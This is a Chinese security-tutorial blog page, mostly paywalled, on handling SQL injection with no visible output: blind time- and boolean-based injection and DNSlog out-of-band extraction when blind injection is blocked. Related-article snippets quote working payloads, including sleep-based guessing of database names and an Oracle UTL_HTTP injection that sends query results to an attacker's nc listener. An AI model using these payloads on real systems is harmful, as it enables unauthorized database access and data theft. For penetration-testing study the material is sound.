26-3 SQL注入攻击 - SQL注入无回显,盲注又被封怎么办?

已于 2024-03-12 22:47:25 修改
阅读量585 收藏
点赞数 1
分类专栏: Web安全攻防全解析 文章标签: sql 数据库
于 2024-03-11 21:00:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263566/article/details/136631963
版权
本文介绍了当遇到SQL注入无回显和盲注被封锁时的应对策略。通过基于时间与布尔的盲注技术进行SQL注入,以及在盲注被封锁时利用DNSlog平台获取数据。详细阐述了DNS解析过程、UNC命名惯例,以及如何通过DNSLog获取命令执行的回显信息,为安全测试提供解决方案。
摘要由CSDN通过智能技术生成

一、当SQL注入无回显时怎么办?

如果SQL注入无回显,可以尝试使用盲注。盲注是一种在没有明确回显的情况下进行SQL注入的方法。基于时间的盲注可以通过构造特定的SQL语句来判断条件是否成立,从而推测出数据库中的数据。基于布尔值的盲注则是根据条件是否为真或假来进行推测。

盲注相关文章:

二、如果SQL盲注被封锁怎么办?

如果SQL盲注被封锁,可以考虑使用DNSlog来获取回显数据。盲注速度较慢且容易被WAF或防火墙封禁IP,因此利用DNSlog可以快速有效地获取数据&

了解本专栏 订阅专栏 解锁全文 超级会员免费看
狗蛋的博客之旅
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
26-5 SQL 注入攻击 - 利用dnslog带回回显信息范例
weixin_43263566的博客
03-14 295
因此,这个 payload 的目的是利用 SQL 注入漏洞,尝试加载指定路径下的文件内容,并将结果返回给攻击者。这个 payload 旨在利用盲注漏洞来执行 SQL 查询,通过。目标:使用 DVWA 的盲注作为靶机,获取数据库信息。函数加载数据库中的内容,并将结果返回给攻击者。
SQL注入-不再显示的盲注
qq_25899635的博客
05-22 1482
Blind SQL(盲注) 是注入攻击的其中一种,向数据库发送true或false这样的问题,并根据应用程序返回的信息判断结果,这种攻击的出现是因为应用程序配置为只显示常规错误,但并没有解决SQl注入存在的代码问题。 演示盲注问题。当攻击者利用SQL注入漏洞进行攻击时,有时候web应用程序会显示,后端数据库执行SQL查询返回的错误信息。Blind SQL盲注)与常规注入很接近,不同的是数据库返回...
sql注入回显应用情况
最新发布
weixin_74182283的博客
04-08 1141
load_file为攻击的相关函数,利用concat函数将查询的version与使用的域名包含起来,其中‘\\\\’为转义字符,可以理解为转义\,输出两个\\ ,而使用\的原因也是为了模仿UNC的路径,后面那个.xxx为域名解析,而那个test则是随便输的一个文件,可以是不存在的,只是为了让查询的数据回显到dnslog上。盲注速度很慢,有时候需要一个一个字符去进行爆破,可以但不够高效,并且有时候防火墙还回去禁用ip,此时就可以考虑通过DNSLOG来快速的得到数据。站库分离(这是个作业,老师给的压缩包。
sql注入之页面不能回显(外带,Oracle)
weixin_42478365的博客
09-29 928
很多时候页面不能直接回显,如果是oracle数据库可以用UTL_HTTP将数据反弹到一个外网IP进行查看,具体步骤,如下: 第一步:使用nc监听数据 nc -lvvp 8888 第二步:反弹数据信息 and UTL_HTTP("http://IP:8888/" || (SQL语句))=1-- 判断是否存在UTL_HTTP select count(*) from all_objects where object_name="UTL_HTTP" ...
SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 7512
SQL注入-无回显
SQL注入回显,利用DNSlog构造方式
m0_62207482的博客
03-17 448
防火墙的存在,容易被禁 IP,可以尝试调整请求频率,有条件的使用代理池进行请求。
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **查询方式**: 1. **SELECT查询**:通常用于从数据库中检索数据,例如`select * from news where id=$id`。这里的...
22-5 SQL注入攻击 - 基于时间的盲注
weixin_43263566的博客
01-29 349
通过不断调整substring函数中的参数(第一个参数表示截取的起始位置,第二个参数表示截取的长度),可以逐个猜解数据库名称的每个字符的ASCII码。下面的注入语句其他就是之前测试语句的变种,我们只需将判断条件的condition部分(1=1)改成我们要猜测的语句就行。这条语句的作用是判断数据库名称的长度是否大于5,如果是,则延迟6秒后返回结果。这条语句则是判断数据库名称的长度是否小于10,如果是,则延迟6秒后返回结果;以此类推,逐个猜解数据库名称的每个字符的ASCII码,直到获取完整的数据库名称。
23-1 SQL注入攻击 - 基于布尔的盲注
weixin_43263566的博客
01-30 117
综上所述,通过以上两条语句的执行结果可以得出结论:第一条语句显示异常,我们猜测数据库名的第一个字符ASCII码值大于115,猜测错误;第二条语句导致页面正常,我们猜测数据库名的第一个字符ASCII码值大于110,猜测正确,相结合得知数据库名称的第一个字符的长度在110到115之间。这条语句的作用是判断数据库名称的长度是否大于5,如果是,则正常显示页面。首先,我们需要先获取数据库名称的长度,然后逐个字符进行猜解。这条语句的作用是判断数据库名称的长度是否大于10,如果是,则正常显示页面。
DVWA环境里,普通SQL注入没错误回显原因
qq_43309162的博客
02-24 1560
DVWA环境里,普通SQL注入没错误回显的原因,即使不是盲注没有回显,心态崩了啊。
mysql注入回显_33. 注入信息无回显?(给盲注戴上眼镜)
weixin_32100383的博客
01-21 1179
注入信息无回显?(给盲注戴上眼镜)工具简介:平常的漏洞检测或漏洞利用需要进一步的用户或系统交互。但是一些漏洞类型没有直接表明攻击是成功的。如Payload触发了却不在前端页面显示。(像ssrf,XXE,包括SQL盲注),这样就无法确认漏洞存在。这时候推荐使用CEYE平台。CEYE是一个用来检测带外(Out-of-Band)流量的监控平台,如DNS查询和HTTP请求。因为DNS在解析的时候会留下日志...
SQL注入-无回显】时间盲注:原理、函数、利用过程
06-14 5911
SQL注入-无回显
6-30 无回显sql注入(盲注) 基于位置注入 sqlmap参数
weixin_44371476的博客
07-02 2234
基于时间的盲注 表名的字典 1%27%20and%20if(ascii(substr(database(),1,1))>0,sleep(2),1)%20–+ ?id=1’ and if(ascii(substr(database(),1,1))=0,sleep(2),1) --+ ?id=1’ and if(left(database(),1)=‘s’,sleep(2),1) --+ 基于布尔的盲注 ?id=-1%27%20or%20left(database(),1)=%27u%27%20...
SQL注入(MySQL查询语句、URL编码、无回显
Hardworking666的博客
01-05 1981
文章目录MySQL常用查询语句注释URL编码 MySQL常用查询语句 select user(); 当前MySQL 登录用户名 select database(); 当前MySQL 数据库名 select version(); 当前MySQL 版本 select @@version; 当前MySQL 版本 select @@basedir; 当前MySQL 安装路径(MySQL安装目录) select(length..
sql注入,布尔盲注和时间盲注,无回显
weixin_71008408的博客
01-31 562
这行代码的意思是 截取数据库中第一个字段的长度,并转换为asc码与100比较,我们知道我们数据库名 security ,第一个是s,通过asc码转换值应为115,所以符合,大家可以更改比较数值,去尝试查看超过115,会不会错误不显示。通过order by分组可以看到,如果正确会i显示you are in,错误则无任何提示,由此可以判断出,目前只显示对错,此外前端不会显示任何数据。但是数据库名,表名,列名每个至少有6,7个字母,挨个猜效率肯定很低,所以python启动!
利用 DNSLog无回显注入
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-18 671
基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。无回显注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无回显注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。通常,注入点位于应用程序的输入字段中。触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击
mysql错误回显注入_sql注入 --显错注入
weixin_33914982的博客
01-28 403
前提知识数据库:就是将大量数据把保存起来,通过计算机加工而成的可以高效访问数据库的数据集合数据库结构:库:就是一堆表组成的数据集合表:类似 Excel,由行和列组成的二维表字段:表中的列称为字段记录:表中的行称为记录单元格:行和列相交的地方称为单元格在数据库里有一个系统库:information_schema在它里面有个存着所有库名的表:schemata schema_name 库名在它里面有个存...
84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]
qwsn
01-21 4349
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、高级注入技巧 dnslog无回显注入 1、原理 2、dnslog平台 3、MySQL dnslog无回显注入示例: 4、SQLSERVER dnslog无回显注入示例: 5、总结:
SQL注入攻击与防御(第2版) - 安全技术深度解析
"SQL注入攻击与防御(第2版)" 是一本专注于网络安全中SQL注入问题的专业书籍,由Justin Clarke撰写,并由施宏斌和叶愫翻译成中文。这本书深入探讨了SQL注入这一严重的网络安全威胁,提供了详细的攻击手段分析以及相应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

狗蛋的博客之旅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值